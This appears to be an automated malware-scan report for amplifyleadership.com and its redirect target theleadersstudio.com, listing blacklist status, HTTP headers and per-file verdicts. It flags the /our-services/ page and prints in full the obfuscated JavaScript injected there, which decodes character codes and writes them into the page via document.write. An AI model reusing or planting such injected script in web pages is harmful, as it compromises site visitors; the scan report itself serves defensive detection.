Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=amplifyleadership.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://amplifyleadership.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://amplifyleadership.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Thu, 21 Aug 2014 11:25:25 GMT Age: 1 Location: http://theleadersstudio.com Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://theleadersstudio.com/ | 200 OK Content-Length: 30231 Content-Type: text/html | clean |
http://theleadersstudio.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/x-javascript | clean |
http://theleadersstudio.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://theleadersstudio.com/wp-content/themes/purevision/sliders/cycle/jquery.cycle.all.min.js?ver=2.86 | 200 OK Content-Length: 30320 Content-Type: application/x-javascript | clean |
http://theleadersstudio.com/wp-content/themes/purevision/sliders/cycle/cycle1/cycle1_script.js?ver=1.0.0 | 200 OK Content-Length: 1115 Content-Type: application/x-javascript | clean |
http://theleadersstudio.com/wp-content/themes/purevision/scripts/prettyPhoto/js/jquery.prettyPhoto.js?ver=3.1.3 | 200 OK Content-Length: 24867 Content-Type: application/x-javascript | clean |
http://theleadersstudio.com/wp-content/themes/purevision/scripts/superfish-1.4.8/js/superfish.combined.js?ver=1.0.0 | 200 OK Content-Length: 5387 Content-Type: application/x-javascript | clean |
http://theleadersstudio.com/wp-content/themes/purevision/scripts/script.js?ver=1.0 | 200 OK Content-Length: 7495 Content-Type: application/x-javascript | clean |
http://theleadersstudio.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 15248 Content-Type: application/x-javascript | clean |
http://theleadersstudio.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.9 | 200 OK Content-Length: 9630 Content-Type: application/x-javascript | clean |
http://theleadersstudio.com/wp-content/plugins/jquery-collapse-o-matic/js/collapse.js?ver=1.5.10 | 200 OK Content-Length: 15606 Content-Type: application/x-javascript | clean |
http://theleadersstudio.com/wp-content/themes/purevision/scripts/prettyPhoto/custom_params.js?ver=3.1.3 | 200 OK Content-Length: 7985 Content-Type: application/x-javascript | clean |
http://amplifyleadership.com/our-services | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Thu, 21 Aug 2014 11:25:36 GMT Age: 0 Location: http://theleadersstudio.com/our-services Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://theleadersstudio.com/our-services | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 21 Aug 2014 11:25:37 GMT Location: http://theleadersstudio.com/our-services/ Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://theleadersstudio.com/xmlrpc.php | clean |
http://theleadersstudio.com/our-services/ | 200 OK Content-Length: 26873 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _st=[];var m=[];_st.push("1452002012061931861");m.push("h");_st.push("172012061971861461192");m.unshift("C");_st.push("011862052011321842002");m.push("a");_st.push("001191471201931852002051");m.unshift("m");_st.push("9320019618218319520819");m.push("r");_st.push("7196200190201190196");m.push("C");_st.push("19514318218320019619320");m.unshift("ro");_st.push("220118614418419319019");m.push("o");_st.push("7143199186184201125137142");m.push("d");_st.push("1411972051291822022011");m.unshift("f");_st.push("9612911718220220119612913");m.push("e");_st.push("714214119720512614421");_st.push("0145132200201206193");_st.push("186147");var t=z=o="";var k="U";var String;for(i=0;i<_st.length;++i)z+=_st[i];for(i=0;i<m.length;++i)t+=m[i];while(z.length>0){o+=String[t](parseInt(z.substr(0, 3)-k.charCodeAt(0)));z=z.substr(3);}document.write(o); Antivirus reports:
| ||
http://theleadersstudio.com/wp-includes/js/comment-reply.min.js?ver=3.9.2 | 200 OK Content-Length: 757 Content-Type: application/x-javascript | clean |
http://amplifyleadership.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Thu, 21 Aug 2014 11:25:39 GMT Age: 1 Location: http://theleadersstudio.com/test404page.js Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://theleadersstudio.com/test404page.js | 404 Not Found Content-Length: 21775 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: amplifyleadership.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=900
Connection: close
Date: Thu, 21 Aug 2014 11:25:25 GMT
Age: 1
Location: http://theleadersstudio.com
Server: Microsoft-IIS/7.5
Content-Length: 0
Content-Type: text/html
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
...0 bytes of data.
GET / HTTP/1.1
Host: amplifyleadership.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=900
Connection: close
Date: Thu, 21 Aug 2014 11:25:25 GMT
Age: 1
Location: http://theleadersstudio.com
Server: Microsoft-IIS/7.5
Content-Length: 0
Content-Type: text/html
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: amplifyleadership.com
Referer: http://www.google.com/search?q=amplifyleadership.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: amplifyleadership.com
Referer: http://www.google.com/search?q=amplifyleadership.com
Result:
The result is similar to the first query. There are no suspicious redirects found.